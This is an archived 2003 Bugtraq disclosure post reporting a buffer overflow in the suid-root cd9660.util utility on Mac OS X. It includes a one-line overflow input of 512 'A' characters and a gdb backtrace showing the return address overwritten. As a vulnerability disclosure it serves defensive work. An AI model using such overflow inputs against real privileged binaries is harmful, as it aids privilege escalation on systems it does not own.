| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.58.0312151132450.13512@fsj.fqfubzr.arg> Date: Mon, 15 Dec 2003 11:54:02 -0800 From: Max <rusmir@...a.net> To: bugtraq@...urityfocus.com Subject: Buffer overflow/privilege escalation in MacOS X Hi, It appears that parts of MacOSX that didn't come from BSD are not very well written and have significant security issues. An example is a /System/Library/Filesystems/cd9660.fs/cd9660.util utility. It is suid root and it is vulnerable to a classic buffer overflow due to the lack of input validation. Demonstration: sdsx:/System/Library/Filesystems/cd9660.fs max$ ls -la cd9660.util -rwsr-xr-x 1 root wheel 20476 23 Sep 23:53 cd9660.util sdsx:/System/Library/Filesystems/cd9660.fs max$ ./cd9660.util -p `perl -e "print 'A'x512"` Segmentation fault sdsx:/System/Library/Filesystems/cd9660.fs root# gdb -core /cores/core.1405 ./cd9660.util [gdb banner here] Reading symbols for shared libraries .... done Core was generated by `./cd9660.util'. #0 0x9000d360 in strcat () (gdb) where #0 0x9000d360 in strcat () #1 0x00002b84 in main () #2 0x41414141 in ?? () Thanks, Max.
Powered by blists - more mailing lists